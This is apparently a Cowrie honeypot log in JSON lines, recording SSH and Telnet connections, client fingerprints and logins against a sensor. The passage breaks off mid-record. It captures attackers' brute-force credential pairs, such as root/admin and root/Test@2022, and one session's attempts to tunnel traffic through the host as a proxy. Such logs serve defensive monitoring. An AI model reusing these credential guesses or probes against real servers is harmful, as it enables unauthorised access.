{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:38.437470Z","src_ip":"212.227.235.229","session":"32073ee44a1b"}
{"eventid":"cowrie.session.closed","duration":46.228440046310425,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:42.841289Z","src_ip":"212.227.235.229","session":"423058f70a1d"}
{"eventid":"cowrie.session.closed","duration":46.35314965248108,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:43.788243Z","src_ip":"123.31.39.100","session":"70eda760da97"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":38030,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ed377a5bc07","protocol":"ssh","message":"New connection: 45.88.8.215:38030 (1.2.3.4:22) [session: 0ed377a5bc07]","sensor":"my-vps","timestamp":"2025-08-26T05:39:45.328014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:39:45.742853Z","src_ip":"45.88.8.215","session":"0ed377a5bc07"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:39:45.744054Z","src_ip":"45.88.8.215","session":"0ed377a5bc07"}
{"eventid":"cowrie.login.success","username":"root","password":"Kundan@123","message":"login attempt [root/Kundan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:39:47.830876Z","src_ip":"45.88.8.215","session":"0ed377a5bc07"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:48.168514Z","src_ip":"45.88.8.215","session":"0ed377a5bc07"}
{"eventid":"cowrie.session.closed","duration":46.24401903152466,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:48.908190Z","src_ip":"123.31.39.100","session":"d454a0a72e94"}
{"eventid":"cowrie.session.closed","duration":46.18166470527649,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:51.955079Z","src_ip":"212.227.235.229","session":"bdf6a0c576f7"}
{"eventid":"cowrie.session.closed","duration":47.11891841888428,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:54.993387Z","src_ip":"212.227.235.229","session":"a303c4930483"}
{"eventid":"cowrie.session.closed","duration":47.06543183326721,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:55.034891Z","src_ip":"212.227.235.229","session":"5326a2de75f8"}
{"eventid":"cowrie.session.closed","duration":47.09167408943176,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:56.027029Z","src_ip":"212.227.125.160","session":"0713d306f112"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56370,"dst_ip":"1.2.3.4","dst_port":23,"session":"29151eadb458","protocol":"telnet","message":"New connection: 212.227.125.160:56370 (1.2.3.4:23) [session: 29151eadb458]","sensor":"my-vps","timestamp":"2025-08-26T05:41:37.833063Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59202,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d8c213e7fef","protocol":"ssh","message":"New connection: 212.227.235.229:59202 (1.2.3.4:22) [session: 8d8c213e7fef]","sensor":"my-vps","timestamp":"2025-08-26T05:41:44.977244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:41:45.841052Z","src_ip":"212.227.235.229","session":"8d8c213e7fef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:41:45.842065Z","src_ip":"212.227.235.229","session":"8d8c213e7fef"}
{"eventid":"cowrie.session.closed","duration":12.576793432235718,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:41:50.409779Z","src_ip":"212.227.125.160","session":"29151eadb458"}
{"eventid":"cowrie.login.success","username":"root","password":"Mohit@123","message":"login attempt [root/Mohit@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:41:50.507428Z","src_ip":"212.227.235.229","session":"8d8c213e7fef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56693,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f4fa3585a6c","protocol":"telnet","message":"New connection: 212.227.125.160:56693 (1.2.3.4:23) [session: 1f4fa3585a6c]","sensor":"my-vps","timestamp":"2025-08-26T05:41:50.655626Z"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:41:51.327845Z","src_ip":"212.227.235.229","session":"8d8c213e7fef"}
{"eventid":"cowrie.session.closed","duration":12.740736246109009,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:42:03.396290Z","src_ip":"212.227.125.160","session":"1f4fa3585a6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57017,"dst_ip":"1.2.3.4","dst_port":23,"session":"1767217a59f8","protocol":"telnet","message":"New connection: 212.227.125.160:57017 (1.2.3.4:23) [session: 1767217a59f8]","sensor":"my-vps","timestamp":"2025-08-26T05:42:03.628668Z"}
{"eventid":"cowrie.session.closed","duration":12.810184478759766,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:42:16.438781Z","src_ip":"212.227.125.160","session":"1767217a59f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57342,"dst_ip":"1.2.3.4","dst_port":23,"session":"e8d841907624","protocol":"telnet","message":"New connection: 212.227.125.160:57342 (1.2.3.4:23) [session: e8d841907624]","sensor":"my-vps","timestamp":"2025-08-26T05:42:16.607597Z"}
{"eventid":"cowrie.session.closed","duration":12.832274198532104,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:42:29.439680Z","src_ip":"212.227.125.160","session":"e8d841907624"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57636,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b8a52df29a3","protocol":"telnet","message":"New connection: 212.227.125.160:57636 (1.2.3.4:23) [session: 2b8a52df29a3]","sensor":"my-vps","timestamp":"2025-08-26T05:42:29.653687Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25680,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f81a831cf0c","protocol":"ssh","message":"New connection: 213.209.150.239:25680 (1.2.3.4:22) [session: 7f81a831cf0c]","sensor":"my-vps","timestamp":"2025-08-26T05:42:31.847636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:42:31.848665Z","src_ip":"213.209.150.239","session":"7f81a831cf0c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T05:42:31.905184Z","src_ip":"213.209.150.239","session":"7f81a831cf0c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:42:32.186887Z","src_ip":"213.209.150.239","session":"7f81a831cf0c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":25157,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:25157","sensor":"my-vps","timestamp":"2025-08-26T05:42:32.244503Z","session":"7f81a831cf0c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T05:42:32.301471Z","src_ip":"213.209.150.239","session":"7f81a831cf0c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":29716,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29716","sensor":"my-vps","timestamp":"2025-08-26T05:42:32.454889Z","session":"7f81a831cf0c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T05:42:32.512049Z","src_ip":"213.209.150.239","session":"7f81a831cf0c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:42:32.569386Z","src_ip":"213.209.150.239","session":"7f81a831cf0c"}
{"eventid":"cowrie.session.closed","duration":12.77571725845337,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:42:42.429335Z","src_ip":"212.227.125.160","session":"2b8a52df29a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57936,"dst_ip":"1.2.3.4","dst_port":23,"session":"60d0201723d0","protocol":"telnet","message":"New connection: 212.227.125.160:57936 (1.2.3.4:23) [session: 60d0201723d0]","sensor":"my-vps","timestamp":"2025-08-26T05:42:42.629426Z"}
{"eventid":"cowrie.session.closed","duration":12.782172203063965,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:42:55.411534Z","src_ip":"212.227.125.160","session":"60d0201723d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58267,"dst_ip":"1.2.3.4","dst_port":23,"session":"79b0e8bbb582","protocol":"telnet","message":"New connection: 212.227.125.160:58267 (1.2.3.4:23) [session: 79b0e8bbb582]","sensor":"my-vps","timestamp":"2025-08-26T05:42:55.597873Z"}
{"eventid":"cowrie.session.closed","duration":12.822509050369263,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:43:08.420277Z","src_ip":"212.227.125.160","session":"79b0e8bbb582"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58592,"dst_ip":"1.2.3.4","dst_port":23,"session":"c58cbccaba89","protocol":"telnet","message":"New connection: 212.227.125.160:58592 (1.2.3.4:23) [session: c58cbccaba89]","sensor":"my-vps","timestamp":"2025-08-26T05:43:08.626963Z"}
{"eventid":"cowrie.session.closed","duration":12.787468910217285,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:43:21.414353Z","src_ip":"212.227.125.160","session":"c58cbccaba89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58932,"dst_ip":"1.2.3.4","dst_port":23,"session":"255d2a398abf","protocol":"telnet","message":"New connection: 212.227.125.160:58932 (1.2.3.4:23) [session: 255d2a398abf]","sensor":"my-vps","timestamp":"2025-08-26T05:43:21.627549Z"}
{"eventid":"cowrie.session.closed","duration":12.776744365692139,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:43:34.404197Z","src_ip":"212.227.125.160","session":"255d2a398abf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59250,"dst_ip":"1.2.3.4","dst_port":23,"session":"76a838828014","protocol":"telnet","message":"New connection: 212.227.125.160:59250 (1.2.3.4:23) [session: 76a838828014]","sensor":"my-vps","timestamp":"2025-08-26T05:43:34.665514Z"}
{"eventid":"cowrie.session.closed","duration":12.744811296463013,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:43:47.410260Z","src_ip":"212.227.125.160","session":"76a838828014"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59567,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f9ca80313ca","protocol":"telnet","message":"New connection: 212.227.125.160:59567 (1.2.3.4:23) [session: 4f9ca80313ca]","sensor":"my-vps","timestamp":"2025-08-26T05:43:47.647288Z"}
{"eventid":"cowrie.session.connect","src_ip":"58.82.231.202","src_port":56808,"dst_ip":"1.2.3.4","dst_port":23,"session":"f9c8f0bcf921","protocol":"telnet","message":"New connection: 58.82.231.202:56808 (1.2.3.4:23) [session: f9c8f0bcf921]","sensor":"my-vps","timestamp":"2025-08-26T05:43:50.757572Z"}
{"eventid":"cowrie.session.closed","duration":12.780025005340576,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:44:00.427247Z","src_ip":"212.227.125.160","session":"4f9ca80313ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59866,"dst_ip":"1.2.3.4","dst_port":23,"session":"0a823e5eb4d0","protocol":"telnet","message":"New connection: 212.227.125.160:59866 (1.2.3.4:23) [session: 0a823e5eb4d0]","sensor":"my-vps","timestamp":"2025-08-26T05:44:00.603382Z"}
{"eventid":"cowrie.session.closed","duration":13.244446516036987,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:44:04.001939Z","src_ip":"58.82.231.202","session":"f9c8f0bcf921"}
{"eventid":"cowrie.session.closed","duration":12.82664179801941,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:44:13.429957Z","src_ip":"212.227.125.160","session":"0a823e5eb4d0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52300,"dst_ip":"1.2.3.4","dst_port":22,"session":"c128307540a4","protocol":"ssh","message":"New connection: 217.72.205.35:52300 (1.2.3.4:22) [session: c128307540a4]","sensor":"my-vps","timestamp":"2025-08-26T05:45:24.493894Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:45:24.497488Z","src_ip":"217.72.205.35","session":"c128307540a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49628,"dst_ip":"1.2.3.4","dst_port":23,"session":"332802d74fb6","protocol":"telnet","message":"New connection: 212.227.235.229:49628 (1.2.3.4:23) [session: 332802d74fb6]","sensor":"my-vps","timestamp":"2025-08-26T05:46:19.099275Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:46:19.289387Z","src_ip":"212.227.235.229","session":"332802d74fb6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:46:19.348399Z","src_ip":"212.227.235.229","session":"332802d74fb6"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.27","src_port":52478,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a55a95166ee","protocol":"ssh","message":"New connection: 176.65.148.27:52478 (1.2.3.4:22) [session: 1a55a95166ee]","sensor":"my-vps","timestamp":"2025-08-26T05:46:51.562780Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:46:51.582980Z","src_ip":"176.65.148.27","session":"1a55a95166ee"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.27","src_port":58942,"dst_ip":"1.2.3.4","dst_port":22,"session":"516981447cf3","protocol":"ssh","message":"New connection: 176.65.148.27:58942 (1.2.3.4:22) [session: 516981447cf3]","sensor":"my-vps","timestamp":"2025-08-26T05:47:02.627795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:47:02.628667Z","src_ip":"176.65.148.27","session":"516981447cf3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:47:02.647103Z","src_ip":"176.65.148.27","session":"516981447cf3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T05:47:02.705212Z","src_ip":"176.65.148.27","session":"516981447cf3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:47:03.730829Z","src_ip":"176.65.148.27","session":"516981447cf3"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.27","src_port":38164,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea0c35cfe766","protocol":"ssh","message":"New connection: 176.65.148.27:38164 (1.2.3.4:22) [session: ea0c35cfe766]","sensor":"my-vps","timestamp":"2025-08-26T05:47:03.768391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:47:03.769137Z","src_ip":"176.65.148.27","session":"ea0c35cfe766"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:47:03.788981Z","src_ip":"176.65.148.27","session":"ea0c35cfe766"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T05:47:03.858389Z","src_ip":"176.65.148.27","session":"ea0c35cfe766"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:47:04.878397Z","src_ip":"176.65.148.27","session":"ea0c35cfe766"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52970,"dst_ip":"1.2.3.4","dst_port":22,"session":"1276fbea7088","protocol":"ssh","message":"New connection: 212.227.125.160:52970 (1.2.3.4:22) [session: 1276fbea7088]","sensor":"my-vps","timestamp":"2025-08-26T05:47:15.648587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:47:18.069702Z","src_ip":"212.227.125.160","session":"1276fbea7088"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","s